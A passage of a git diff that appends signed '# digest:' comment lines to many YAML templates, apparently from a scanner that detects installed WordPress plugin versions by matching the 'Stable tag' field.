newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..956c0e5b65 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202df9732f740eae61adefc3c773c6fcb9636034364ab28cfad2ef607e1851591002200f279d5ff7927c73bca2e534460571e897033b9df2d679e3e962c03555e865b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..4bba6e3236 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba8ce48e4dc781ba08946334beed4326ebf19f83b9b02e64c1bec84ca8679da3022100dfb50cc5210c1313f7be1c05ef6097c80f1990c075e59efea8fa9f36d355fb60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..191db3e7d6 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201de62249a0ee24646ec876a1f84a258120a2a814c937e1a6de12521e6dfd1df302205720a3234711f31b019abc45c0c9d0173cc9748e8a857a94d9b02d8ad609546c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..bb6d549a28 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009391f4c5583b946cd169fb6a3d02238835cd04d3fd8a126a29576e2d59f7ab6a02200ae2dba28c079cefb99a4947e43721154d9c383635d8160ef2542f932b487760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..dba08b2aad 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210094ed24404a60814e4079abe0b2b0d72d1271b3e59d78aefdd2f82ee529cedf92022100b12ad1391408ddba975704bd5ddf56021f9c7b6e8ad2d155a5bd6ebd09360ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..902a6feb34 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205681d9bc9ffc0d57470edc6ee97e007aeda9149f94ed3ab75cba0e3ec2d3cec9022100f93da2db208bd6f0fbf6331e5df823d746c1b9451d4667a7f74c1e92172d0898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..d6110b55d4 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074a93b4cd30c5c4002706b3198b26882973b91ebe6b95dd91d1dc29a87da38c8022100e59bf1bfdcdb3da575ccced326acc997bc3aacad9141f9e8b4c80defdbf67c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..d0cbb5d890 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100881b910cf85347244be1150fd232a31fa97d1f2fddc8c321f7f089d973f8ac7f022060a0ed743abaacf5f041a0fb45618b4e3e8d14fdcc843bec34c644911d9299b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..e5b105a9b9 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b596a36fd6efb3a4e672ad84559fcfa02850988e269c4fd52a22a69675fffd5022100f8a4df34e4a8651f719d9cebd777d4448e7e52699c85cbb631c17bdb900f7771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..6252d46ddc 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206739464cb623c68ed0df4589d5fb6e8c8187a30edc196d5c141ce583cc9710f90220594570d6a11a0a2b1f724a1e6979aff64037b87859cd779e2893809994faceb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..bbf6910a40 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220790768da970a20f3bd890fd7fbf93cc7c879cdec2c756d5a35e09ee8cc10befe02203ec410b5bd4845fb981a8015149faee3ab99e449a7a2214480b8aff9c7e672d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..703b1f53ac 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220339f893e3efce940a548072d00db202c03fb7693cbed1792d998523d9d26d29d022100d6c6b606fa1ae7fd34985101c5bc5ccc2e804e5cc4337e9df621b3b384bd056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..b4c674a93f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c50d8b4a45d0d53b144f8711b255a4c9388ec0a89f6aa8dd4cb04a03663d05d022012a6d49247249ccc01acc7c410f94c6c623b7fb71f5341d22b16063f6b9fb5b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..94a31ea600 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066b4e30f494404096d0e06a809a482c18f2c5b02167cdeddebf20f30e459ec90022047b680f4eb64ea4275e5fefdfa939a00b6748d5516b30f1944dc3ed1e12ed49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..cafb729796 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009151e10d0bea4aa9d96015842d91f721f116775d6cd106d5445ca431ad36e80a022071ef2a83242172beadfa4fddf5d0f4c94d84b1e528f6cf9ecd94d01ab23d98c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..a0d592972a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d0dc36db6924f9753e3431c04706411a49e371cf494bced6959f09d1cd72a8e02203d583d761010935c92d7f01eae41be6fb3c7ae3b5090126e0098e56b30ca1bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..2ebbd61eee 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d04ccb99971aa4953f9c33fad148bf56dfcb69a84eb15a5d8ec2413be6e2ef04022100ad0e2ea7af645ce2f85f7d2c69bea3ecfaa7ab76be934bbd7e27362e9949fcae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..2f6fe06e08 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7ec6a6c72e7f9b92ee07627ef5236944f3ad85bb835e2012b5917101f0b6371022100fbb9b00ade408a0e02e1afc172bb10a9ea32d8d821e0ae3862146ddedbf47e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..8eebac375e 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e280f6cc83036eb0aecb41a3af235b4b3e420805c5341e13d1277176e1556a250220532425e58d01382b95f0dcdb7cd62112369ddf23c03511219b0f334166c7f3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..3c606dfc0c 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca28d01cc6a0c4bdf7cdd88f3c65d1918ee0f16bc4341e1e508869823d41e644022100a5f3b017070bfbfb7e3660eb72c0137b1a9e15cf79adfba7df97240a5b4e9fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..9e8b4e32d7 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100850fbfb7e5415f70da15b02df0366d757edd89f935212f47ea86d2a21a9a4339022100f01e816b9fca0b5b047c31fd6b3a1c27173fa4de510410719fe75e93a6b0aef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..de37f47287 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f07e73eb69ce00ee7fee870029500541e07f225af88627b27269c8e31e71b7f302200815bb02877ae77bceb8c9530be35b481718fe497c0bd7fc49b4f0b5de265b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..c84a853e50 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ab8c36aaaac556056cf9f559856cf180547d99f7061a1e477aedcd96cfdfdc00221009c0475b08d5358f007fcfd298c460507237fa9a5cb4f2502c0258d06aeee92d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..088c5d768a 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a388d964cda6ce890cf8371ca2af110e20dba2fa79f7566e69c1a5149ef0b9670220499f6dcd84f30b4f6beda5172a6c1f2b58a23d9d5bf68ac5d0110e55b4dc47f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..b0416aea17 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b611f8cc8d94d21bb2ad69ea7ea1c2d029b27795cf97d42308bc131e175bd02a02205ae253538fded0b1e320170831b74e0588c40aba36394565263c368aa1f84432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..cd35b6852c 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057847e86f4e979d7321f26c305f4325e80a5f9f061047db22933ec335f3cc5d40220773dc8aaf89c9acf7f05cc2fe3b9f38f72800493bf6d8fb23cf6c2582c802a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..b492259725 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206830193716166df911568cab3e7d6ec4bfc796d58cbb0f6120ef4fa5fef0a9600220795b68d8355902ac54279b8279a030812e85929f0326772eab229698e9444756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..6ab6fe1857 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100beb785a9e4d69ab3178c5849b6f1a8c15b3aa25aa19cb7f11d255b085d85dd85022100cded374998ee7ca7200e9393618e26c97000a16fdeb87c9d3f05dc6f34670bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..260bdd0b29 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040b3d1faef230d8be754882ce985f16c4a5c035105fe24f1b92ce596bc28c64102205f2bf89c7811c9226fe2b901b5f5f9f81f61e40190e4f47bb5b30c7c19de36ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..2262dd822b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef63bff8df8caf334edd220d15dd71e9faa82ae57949ebac7d5cec174675cd76022100dfefce3818dc25208e445ac809436ebfea915a8e593b7b718dfe7fac0634bd1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..d6efba4e31 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206eb440d991569aadd61685405f04e76d630cd661c12a03edc9da94d25bc03a380220783ded88acbe962891bf378e982ba7d1c32a4a31f6e80f7794e9b662bcab8903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..5b4adc339d 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b449aa05cc7772b0d3b99f0e02dd6669139ceacd7d0688c50bfa3abc572a03a02206cd534622bf5d253eef38d3da8edc8449fe3bc002453abd8cac5846954ebe5c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..6524c3e39b 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b40f9c9009a778b48ac8e103b61471ab8c02df63020e945920f79fde3120e8c0022041a028670298dad115a9b0a3201b3c6a7b43eed624a3cd6b68ee9d4ea328ede8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..d44ac6f3c0 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034e47f55df28d3cc395ff3994d4897692e075c01a100eb0a9e751d033c64cc7e022100bdc15fc9f9de350832157a7ee2b998fd0d3b4896d048dcfbabddbfffb288050b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..3464450509 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203055ba348257950a08f743d4b8ed4fa68ecae5258a1a3a50f1d9b64e67d64a600220792b43bba2b9907de0116b224403c9c236ca89fa8f41eb497ddc4bb147e0b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..6edbbef639 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c7cfbeb34e7c4058e4d2e433c79e8c8a1eec1009df9992c4042a9bac388011b022074d0c36b4d6ebc4cd43f2b2bd966e04ecbf997a667a12d8eabd54695c7f86eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..755e73a9ff 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205538a8e5786fcae19b0e505e0efbdcbae34fe6a46116b02ef8ab52108fd45f6602206332df2cefe682fbabba3bb3a0a58a45970d880db84c4692168c56071e1571cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..48cedfb5dd 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab8efd55600a6feb97f0bff3b2695b2a82f7300e542d2e3835cfb4e76a497573022100abbd747562da9c053bfbec900a5796d0419dfe23c77c4a556265834fbd2f4c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..54b9dbfd62 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e900f42129cdd40e5ba9bec8fc845392ea4149ca1de868a0f49144b8ac0491e702201ba0932284d21dc009081dd43b0274a889bad4c029f308fda58a114403f67781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..79a0ba4599 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025682fb39ca2080c465ef246fcca5bf21f27449c66e356f4afc7fcbb5d0f27d9022100c77ccabbce4f82aee21f6e9128a05df2b48a658d4c437ccbb81cde37e909b8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..1cce1a6482 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3c115ad1b6bc865e4af4702ada3674abe546751fa444d1456c2be37a301febe022100c4507da89c53b586fca773a26421f641c0e81837e777257c11e38b7ebc7f47fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..51a3670296 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e168b89f7f3017f78ab9f95e8f8f44995ec31fc063cb36efb1c31b65754b0793022027ea98781d3f4b8c552455547e6d97bb13cf7d2e7421b0d5daeed110d8997770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..63b34616c2 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008450cb3d227ec4e59c05583c6ff608f40cca5c65a7b56ea355cc3a42f1e4737a022100ccfc7227c7bee39e5ed234b74327e34bfb97b4da7c8ddbac5a396c8c16b9eae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..cbbe6b7d5b 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4b71c3bdb87853c92c02fb95a90c02c1b52b6ff19a10893b28aa8be88bcf9da0221009b2127b546ab9396f54090cb741bca6744889f145ba5c875332f45e6e8f554fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..2ffd4ab2d9 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f1fc1ec179b8f103c197708466e876043d01701734007023d10663f69eda10002204ddaa9a8e2c56acad4622e11c1a21612c7e14cacff2a713ab89034a98b8a58b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..23223eb368 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206352c15639aa03b2a1b0e4175e5e36be014131f350e4732d1ba5ff09e77f882f022100d9cc00c400eb37dd7cd3c73eb5ec6c2473e75ea79d2cad7cac581fcc01b34a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..8dd23fc1ec 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - 